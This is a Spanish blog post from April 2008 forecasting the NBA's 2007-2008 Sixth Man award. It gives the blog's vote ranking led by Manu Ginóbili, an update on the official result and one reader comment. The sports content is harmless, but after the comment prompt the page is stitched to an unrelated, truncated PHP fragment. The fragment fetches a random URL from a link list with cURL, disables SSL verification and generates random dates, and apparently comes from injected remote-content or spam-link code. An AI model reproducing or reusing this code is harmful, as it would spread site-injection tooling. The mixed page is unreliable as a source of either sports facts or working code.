Los premios de la 2007-2008: Mejor 6º Hombre

22 de April de 2008 por MagicJohnson32

En breve se iniciará el tradicional carrusel de premios que la NBA otorga cada año a los jugadores más destacados en diferentes categorías. Desde TJNBA haremos una previsión de cada uno de ellos analizando las actuaciones de los principales candidatos y tratando de anticiparos el nombre del ganador. Y empezamos con el premio al Mejor Sexto Hombre.manushot

Poca emoción y ningún suspense presenta este galardón. Es lo que sucede cuando un jugador de la categoría de Manu Ginóbili parte desde el banquillo. El argentino ha firmado la mejor temporada de su vida en una campaña en la que ha formado en el quinteto inicial en sólo 23 ocasiones, dato que no disimula su mayor transcendencia en el juego de los Spurs. El internacional albiceleste ha hecho máximos en puntos anotados (ha aumentado en más de 3 puntos por partido su mejor promedio), minutos disputados, asistencias y porcentaje de acierto en triples. Y, ante todo, ha demostrado ser uno de los jugadores más resolutivos en los instantes finales, algo que los Suns ya han sufrido en el primer partido de su eliminatoria de primera ronda.

Gregg Popovic decidió regalar a Manu Ginóbili este premio desplazándolo al banquillo y el argentino ha respondido de tal forma que no deja lugar a la discusión. Sólo José Manuel Calderón, durante una breve fase de la competición, pareció en condiciones de disputar el premio al ex-Kinder. Finalmente, Calderón fue titular en demasiadas ocasiones (56) como para ser tenido en cuenta, y Ginóbili se convertirá, sin lugar a dudas, en uno de los mejores 6º de la historia.

El comité de sabios de TJNBA ha elegido como Mejor 6º Hombre 2007-2008 a:

  1. Manu Ginobili – 88 p.
  2. José M. Calderón – 43 p.
  3. Josh Childress – 7 p.
  4. David Lee – 5 p.
  5. Leandro Barbosa – 4 p.
  6. Juan C. Navarro – 2 p.
  7. Ronny Turiaf – 1 p.

Actualización: Esta pasada madrugada la NBA ha anunciado que Manu Ginóbili es el ganador del premio al Mejor 6º Hombre de la temporada 2007-2008. ¡Pero os prometemos que lo teníamos escrito con antelación! El año pasado, la NBA anunció este premio el 23 de abril, pero en esta ocasión se han adelantado un par de días. De todos modos, no tiene ningún mérito acertar con este galardón. Ginóbili ha recibido 123 de los 124 votos posibles como primera opción para el premio. Leandro Barbosa, mejor 6º hombre la pasada campaña, ha sido segundo, y el jugador de los Mavs Jason Terry ha finalizado tercero. La elección de Ginóbili incide en la tendencia que este premio está tomando en los últimos años, que está yendo a parar a manos de jugadores habitualmente titulares y estrellas en sus equipos que durante una temporada, y por decisión técnica, salen desde el banquillo. Fue el caso de Antawn Jamison en 2004, Ben Gordon en 2005 y Mike Miller en 2006.

Comenta

Un comentario a esta entrada

  1. Gallis dice:
    #1

    Pues lo dicho, estaba cantado, pero repito mis apuntes sobre la lista oficial definitiva:

    – El único que no ha votado a Manu como el primero, tampoco le ha votado ni como segundo ni como tercero…menudo cachondo, jojojojo…
    – Lo de Terry en el tercer puesto es una broma de mal gusto.
    – Lo de Gordon quinto debería ser motivo de despido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>